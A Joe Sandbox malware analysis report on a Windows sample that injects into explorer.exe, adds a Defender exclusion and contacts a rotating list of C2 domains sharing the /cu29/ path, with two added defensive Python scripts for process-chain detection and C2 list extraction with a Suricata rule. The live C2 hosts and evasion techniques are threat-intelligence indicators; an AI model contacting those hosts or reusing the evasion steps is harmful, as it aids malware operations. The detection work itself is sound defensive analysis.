            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1569252 | Sample: JHnNxt6Pnb.exe | Start date: 05/12/2024 | Architecture: WINDOWS | Score: 100

Root-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
Root-level DNS/IP nodes: www.68716329.xyz; www.yzq0n.top; 9 other IPs or domains (signature attached to these: Performs DNS queries to domains with low reputation)

JHnNxt6Pnb.exe (node 11; count shown: 4) - started
    dropped file: C:\Users\user\AppData\...\JHnNxt6Pnb.exe.log, ASCII
    signatures: Adds a directory exclusion to Windows Defender; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
    +-- JHnNxt6Pnb.exe (node 15) - started
    |   signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
    |   +-- explorer.exe (node 20; counts shown: 80, 1) - injected
    |       network: www.irex.info 85.13.166.18, 49716 -> 80, NMM-ASD-02742FriedersdorfHauptstrasse68DE, Germany
    |       signatures: System process connects to network (likely due to code injection or exploit); Uses ipconfig to lookup or modify the Windows network settings
    |       +-- ipconfig.exe (node 28) - started
    |       |   signatures: Modifies the context of a thread in another process (thread injection); Reads the DNS cache; Maps a DLL or memory area into another process; 2 other signatures
    |       |   +-- cmd.exe (node 33; count shown: 1) - started
    |       |       +-- conhost.exe (node 35) - started
    |       +-- autoconv.exe (node 31) - started
    +-- powershell.exe (node 18; count shown: 23) - started
        signatures: Loading BitLocker PowerShell Module
        +-- WmiPrvSE.exe (node 24) - started
        +-- conhost.exe (node 26) - started
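The graph above is the part of this report that turns most directly into detection logic: the sample starts a second copy of itself, that copy injects into explorer.exe, the injected explorer.exe talks to www.irex.info on port 80 and launches ipconfig.exe, and ipconfig.exe launches cmd.exe. The script below is an added example, not part of the Joe Sandbox report and not its signature code. It replays the graph's edges as a constructed event list (node numbers are the graph's), emits one finding per suspicious edge, and walks cmd.exe back to the original sample across the injection edge, which is what makes the conhost.exe at the bottom attributable to the sample at all. The image lists it uses are assumptions, not a FormBook specification.

```python
"""Replay the behavior graph as an event stream and flag the injection chain.

Added example; not part of the Joe Sandbox report and not its signature logic.
Events are constructed from the graph's edges (node numbers are the graph's).
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    kind: str         # "start": actor launched target; "inject": actor wrote into target; "connect"
    actor: str        # image name of the acting process
    actor_id: int     # graph node number
    target: str       # child image, injected image, or remote endpoint
    target_id: int = 0


# Constructed from the graph edges above (process nodes only).
EVENTS = [
    Event("start",   "JHnNxt6Pnb.exe", 11, "JHnNxt6Pnb.exe", 15),
    Event("start",   "JHnNxt6Pnb.exe", 11, "powershell.exe", 18),
    Event("inject",  "JHnNxt6Pnb.exe", 15, "explorer.exe",   20),
    Event("start",   "powershell.exe", 18, "WmiPrvSE.exe",   24),
    Event("start",   "powershell.exe", 18, "conhost.exe",    26),
    Event("connect", "explorer.exe",   20, "www.irex.info:80"),
    Event("start",   "explorer.exe",   20, "ipconfig.exe",   28),
    Event("start",   "explorer.exe",   20, "autoconv.exe",   31),
    Event("start",   "ipconfig.exe",   28, "cmd.exe",        33),
    Event("start",   "cmd.exe",        33, "conhost.exe",    35),
]

SHELLS = {"cmd.exe", "powershell.exe"}
# Assumed list: the two utilities this graph shows plus two similar ones.
# None of them has a legitimate reason to launch a shell.
UTILITIES = {"ipconfig.exe", "autoconv.exe", "netsh.exe", "nslookup.exe"}


def detect(events):
    """Return one finding string per suspicious edge, in event order."""
    injected = {}                 # target node -> injector node
    findings = []
    for e in events:
        if e.kind == "inject":
            injected[e.target_id] = e.actor_id
            findings.append(f"injection: {e.actor}[{e.actor_id}] -> {e.target}[{e.target_id}]")
        elif e.kind == "start":
            if e.actor.lower() == e.target.lower():
                findings.append(f"self-spawn (hollowing candidate): {e.actor}[{e.actor_id}] -> [{e.target_id}]")
            if e.actor_id in injected:
                findings.append(f"injected process spawned child: {e.actor}[{e.actor_id}] -> {e.target}[{e.target_id}]")
            if e.actor.lower() in UTILITIES and e.target.lower() in SHELLS:
                findings.append(f"utility launched shell: {e.actor}[{e.actor_id}] -> {e.target}[{e.target_id}]")
        elif e.kind == "connect" and e.actor_id in injected:
            findings.append(f"injected process connected out: {e.actor}[{e.actor_id}] -> {e.target}")
    return findings


def lineage(events, node_id):
    """Walk a node back to the root. A node with no start edge but an inject
    edge (explorer.exe here) is attributed to its injector, so the chain
    crosses the injection instead of stopping at the system process."""
    parent = {e.target_id: e.actor_id for e in events if e.kind == "start"}
    injector = {e.target_id: e.actor_id for e in events if e.kind == "inject"}
    image = {e.actor_id: e.actor for e in events}
    image.update({e.target_id: e.target for e in events if e.kind != "connect"})
    chain, cur = [], node_id
    while cur is not None and cur not in chain:
        chain.append(cur)
        cur = parent.get(cur, injector.get(cur))
    return [f"{image[n]}[{n}]" for n in chain]


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
    print(" <- ".join(lineage(EVENTS, 33)))
```

On a real endpoint the "inject" edge comes from a cross-process memory write or thread-context change (Sysmon event 8 or 10, or an EDR's equivalent), not from a sandbox graph; the rest of the logic is the same, and the lineage walk is what lets an alert on cmd.exe under ipconfig.exe name the original dropper rather than explorer.exe.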

[Screenshots section: thumbnails not reproduced in this text export]
Source | Detection | Scanner | Label | Link
JHnNxt6Pnb.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
JHnNxt6Pnb.exe | 100% | Avira | TR/AD.Swotter.yyerx |
JHnNxt6Pnb.exe | 100% | Joe Sandbox ML | |
No Antivirus matches (reported three times, once for each of the report's remaining AV tables)
Source | Detection | Scanner | Label | Link
http://www.yzq0n.top | 0% | Avira URL Cloud | safe |
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | Avira URL Cloud | safe |
http://www.5mwhs.top/cu29/www.layman.vip | 0% | Avira URL Cloud | safe |
http://www.apita.top | 0% | Avira URL Cloud | safe |
http://www.68716329.xyzReferer: | 0% | Avira URL Cloud | safe |
http://www.oldsteps.buzz | 0% | Avira URL Cloud | safe |
http://www.apita.topReferer: | 0% | Avira URL Cloud | safe |
http://www.siabgc4d.online/cu29/ | 0% | Avira URL Cloud | safe |
http://www.leachlondonstore.online/cu29/ | 0% | Avira URL Cloud | safe |
http://www.inn-paaaa.buzz/cu29/www.irex.info | 0% | Avira URL Cloud | safe |
http://www.leachlondonstore.onlineReferer: | 0% | Avira URL Cloud | safe |
http://www.microsoft.c | 0% | Avira URL Cloud | safe |
http://www.irex.info | 0% | Avira URL Cloud | safe |
http://www.inn-paaaa.buzz/cu29/ | 0% | Avira URL Cloud | safe |
http://www.layman.vipReferer: | 0% | Avira URL Cloud | safe |
http://www.48372305.top | 0% | Avira URL Cloud | safe |
http://www.srtio.xyz/cu29/www.leachlondonstore.online | 0% | Avira URL Cloud | safe |
http://www.layman.vip/cu29/www.nd-los.net | 0% | Avira URL Cloud | safe |
http://www.siabgc4d.online/cu29/www.48372305.top | 0% | Avira URL Cloud | safe |
http://www.apita.top/cu29/ | 0% | Avira URL Cloud | safe |
http://www.layman.vip/cu29/ | 0% | Avira URL Cloud | safe |
http://www.inn-paaaa.buzzReferer: | 0% | Avira URL Cloud | safe |
http://www.azino-forum-pro.online/cu29/ | 0% | Avira URL Cloud | safe |
https://android.notify.windows.com/iOS | 0% | Avira URL Cloud | safe |
http://www.azino-forum-pro.onlineReferer: | 0% | Avira URL Cloud | safe |
http://www.68716329.xyz/cu29/www.apita.top | 0% | Avira URL Cloud | safe |
http://www.oldsteps.buzzReferer: | 0% | Avira URL Cloud | safe |
http://www.layman.vip | 0% | Avira URL Cloud | safe |
http://www.azino-forum-pro.online/cu29/www.68716329.xyz | 0% | Avira URL Cloud | safe |
http://www.yzq0n.top/cu29/www.siabgc4d.online | 0% | Avira URL Cloud | safe |
http://www.irex.info/cu29/www.yzq0n.top | 0% | Avira URL Cloud | safe |
http://schemas.micro | 0% | Avira URL Cloud | safe |
http://www.nd-los.net/cu29/me | 0% | Avira URL Cloud | safe |
http://www.leachlondonstore.online | 0% | Avira URL Cloud | safe |
http://www.68716329.xyz/cu29/ | 0% | Avira URL Cloud | safe |
http://www.leachlondonstore.online/cu29/www.5mwhs.top | 0% | Avira URL Cloud | safe |
http://www.siabgc4d.onlineReferer: | 0% | Avira URL Cloud | safe |
http://www.azino-forum-pro.online | 0% | Avira URL Cloud | safe |
http://www.irex.infoReferer: | 0% | Avira URL Cloud | safe |
http://www.apita.top/cu29/www.oldsteps.buzz | 0% | Avira URL Cloud | safe |
http://www.siabgc4d.online | 0% | Avira URL Cloud | safe |
http://www.48372305.top/cu29/www.77179ksuhr.top | 0% | Avira URL Cloud | safe |
http://www.5mwhs.top | 0% | Avira URL Cloud | safe |
http://www.68716329.xyz | 0% | Avira URL Cloud | safe |
http://www.oldsteps.buzz/cu29/www.srtio.xyz | 0% | Avira URL Cloud | safe |
http://www.irex.info/cu29/ | 0% | Avira URL Cloud | safe |
http://www.77179ksuhr.topReferer: | 0% | Avira URL Cloud | safe |
http://www.48372305.top/cu29/ | 0% | Avira URL Cloud | safe |
http://www.77179ksuhr.top/cu29/ | 0% | Avira URL Cloud | safe |
http://www.yzq0n.topReferer: | 0% | Avira URL Cloud | safe |
http://www.f6b-crxy.top/cu29/www.azino-forum-pro.online | 0% | Avira URL Cloud | safe |
http://www.77179ksuhr.top/cu29/www.f6b-crxy.top | 0% | Avira URL Cloud | safe |
http://www.irex.info/cu29/?MvvxBDN=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOM4azueTiHl&Bjk=7nwDmBCH2DD0oHhP | 0% | Avira URL Cloud | safe |
http://www.inn-paaaa.buzz | 0% | Avira URL Cloud | safe |
http://www.5mwhs.top/cu29/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.irex.info | 85.13.166.18 | true | true | | unknown
www.oldsteps.buzz | unknown | unknown | true | | unknown
www.f6b-crxy.top | unknown | unknown | true | | unknown
www.inn-paaaa.buzz | unknown | unknown | true | | unknown
www.azino-forum-pro.online | unknown | unknown | true | | unknown
www.68716329.xyz | unknown | unknown | true | | unknown
www.siabgc4d.online | unknown | unknown | true | | unknown
www.48372305.top | unknown | unknown | true | | unknown
www.77179ksuhr.top | unknown | unknown | true | | unknown
www.apita.top | unknown | unknown | true | | unknown
www.yzq0n.top | unknown | unknown | true | | unknown
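The URL and domain tables above are the sample's C2 rotation list as read out of memory: every campaign host carries the same URI token (/cu29/), and because the strings sat back-to-back in memory, many rows run one host's URL into the next host's name (for example http://www.irex.info/cu29/www.yzq0n.top), while others run into a following "Referer:" header string. The script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox code. It parses rows in the flattened form shown on this page (an assumption about the layout), pulls out the shared token and the host set, chains the glued pairs to recover the order the hosts sit in memory, and emits one Suricata rule on the token (the SID is a placeholder). Whether the malware walks the hosts in that order is not something the report shows, and only www.irex.info actually resolved during this run.

```python
"""Recover the FormBook C2 host list from the flattened URL rows on this page.

Added example; not part of the Joe Sandbox report and not Joe Sandbox code.
Assumes the row layout "<url><n>%Avira URL Cloud<verdict>" seen above, and that
a URL path running into "www.<host>" is the next string in memory.
"""
import re
from urllib.parse import urlsplit

# Constructed input: the glued rows from this report's URL table, plus a few
# benign explorer.exe strings and bare hosts, copied as rendered on the page.
URL_ROWS = """\
http://www.5mwhs.top/cu29/www.layman.vip0%Avira URL Cloudsafe
http://www.68716329.xyzReferer:0%Avira URL Cloudsafe
http://www.inn-paaaa.buzz/cu29/www.irex.info0%Avira URL Cloudsafe
http://www.srtio.xyz/cu29/www.leachlondonstore.online0%Avira URL Cloudsafe
http://www.layman.vip/cu29/www.nd-los.net0%Avira URL Cloudsafe
http://www.siabgc4d.online/cu29/www.48372305.top0%Avira URL Cloudsafe
https://android.notify.windows.com/iOS0%Avira URL Cloudsafe
http://www.68716329.xyz/cu29/www.apita.top0%Avira URL Cloudsafe
http://www.azino-forum-pro.online/cu29/www.68716329.xyz0%Avira URL Cloudsafe
http://www.yzq0n.top/cu29/www.siabgc4d.online0%Avira URL Cloudsafe
http://www.irex.info/cu29/www.yzq0n.top0%Avira URL Cloudsafe
http://www.nd-los.net/cu29/me0%Avira URL Cloudsafe
http://www.leachlondonstore.online/cu29/www.5mwhs.top0%Avira URL Cloudsafe
http://www.apita.top/cu29/www.oldsteps.buzz0%Avira URL Cloudsafe
http://www.48372305.top/cu29/www.77179ksuhr.top0%Avira URL Cloudsafe
http://www.oldsteps.buzz/cu29/www.srtio.xyz0%Avira URL Cloudsafe
http://www.f6b-crxy.top/cu29/www.azino-forum-pro.online0%Avira URL Cloudsafe
http://www.77179ksuhr.top/cu29/www.f6b-crxy.top0%Avira URL Cloudsafe
http://www.irex.info/cu29/?MvvxBDN=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOM4azueTiHl&Bjk=7nwDmBCH2DD0oHhP0%Avira URL Cloudsafe
"""

ROW_RE = re.compile(r"^(?P<url>.+?)(?P<pct>\d+)%Avira URL Cloud(?P<verdict>\w+)$")
HOST_RE = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$", re.I)


def parse_rows(text):
    """Yield the URL column of every row that matches the flattened layout."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            yield m.group("url")


def split_glued(url):
    """Return (host, uri_token, next_host). next_host is a hostname that ran
    into this URL's path, or None; a glued 'Referer:' is cut off first."""
    parts = urlsplit(url.split("Referer:")[0])
    host = (parts.hostname or "").lower()
    segs = [s for s in parts.path.split("/") if s]
    token = segs[0] if segs else None
    nxt = segs[1].lower() if len(segs) > 1 and HOST_RE.match(segs[1]) else None
    return host, token, nxt


def extract_c2(text):
    """Return (token, hosts, successors): the URI token shared by the most
    hosts, every host seen with it, and the host -> next-host links."""
    by_token, successors = {}, {}
    for url in parse_rows(text):
        host, token, nxt = split_glued(url)
        if not token:
            continue                       # bare host: nothing ties it to a campaign
        by_token.setdefault(token, set()).add(host)
        if nxt:
            by_token[token].add(nxt)
            successors[host] = nxt
    if not by_token:
        return None, set(), {}
    token = max(by_token, key=lambda t: len(by_token[t]))
    hosts = by_token[token]
    return token, hosts, {h: n for h, n in successors.items() if h in hosts}


def memory_order(hosts, successors):
    """Chain the glued pairs into the order the strings sit in memory, starting
    from the one host that is nobody's successor. More than one head means a
    row is missing; then a plain sorted list is returned instead."""
    heads = [h for h in hosts if h not in successors.values()]
    if len(heads) != 1:
        return sorted(hosts)
    order, cur = [], heads[0]
    while cur and cur not in order:
        order.append(cur)
        cur = successors.get(cur)
    return order


def suricata_rule(token, sid=1000001):
    """HTTP URI rule for the shared token; the sid is a placeholder."""
    return (f'alert http $HOME_NET any -> $EXTERNAL_NET any '
            f'(msg:"FormBook C2 URI /{token}/"; flow:established,to_server; '
            f'http.uri; content:"/{token}/"; startswith; '
            f'classtype:trojan-activity; sid:{sid}; rev:1;)')


if __name__ == "__main__":
    token, hosts, succ = extract_c2(URL_ROWS)
    print(f"shared URI token: /{token}/  hosts: {len(hosts)}")
    for i, h in enumerate(memory_order(hosts, succ), 1):
        print(f"{i:2d}. {h}")
    print(suricata_rule(token))
```

Running it lists 16 hosts in one unbroken chain from www.inn-paaaa.buzz to www.nd-los.net, which doubles as a check that no row was lost: a gap in the chain produces a second head and the function falls back to a sorted list. Bare hosts and the explorer.exe strings (msn.com, android.notify.windows.com) drop out because they share no URI token with the campaign, so the blocklist is the 16 hosts and nothing else.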
Name | Malicious | Antivirus Detection | Reputation
www.f6b-crxy.top/cu29/ | false | | high
http://www.irex.info/cu29/?MvvxBDN=IwPUjMyQOkFzpF8yWccrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOM4azueTiHl&Bjk=7nwDmBCH2DD0oHhP | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://powerpoint.office.comer | explorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.siabgc4d.online/cu29/ | explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://android.notify.windows.com/iOSA4 | explorer.exe, 00000006.00000000.1554749905.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000006.00000002.4005157734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.yzq0n.top | explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.leachlondonstore.online/cu29/ | explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 00000006.00000002.4008024188.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1554749905.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1 | explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.68716329.xyzReferer: | explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nd-los.net/cu29/ | explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.apita.topReferer: | explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.oldsteps.buzz | explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.5mwhs.top/cu29/www.layman.vip | explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apita.top | explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal | explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.inn-paaaa.buzz/cu29/www.irex.info | explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.c | explorer.exe, 00000006.00000002.4005528609.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076441838.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285166751.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1550468760.0000000009237000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.leachlondonstore.onlineReferer: | explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | JHnNxt6Pnb.exe, 00000000.00000002.1539683468.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://android.notify.windows.com/iOSd | explorer.exe, 00000006.00000000.1554749905.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.inn-paaaa.buzz/cu29/ | explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi | explorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2658127504.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076869656.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmp | false | |
                                                          high
                                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000003.2288839218.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1546504682.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.irex.infoexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.layman.vipReferer:explorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.srtio.xyz/cu29/www.leachlondonstore.onlineexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000006.00000002.4003044137.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.48372305.topexplorer.exe, 00000006.00000003.2287806663.000000000C17F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4010009034.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2657394543.000000000C183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2287705335.000000000C160000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
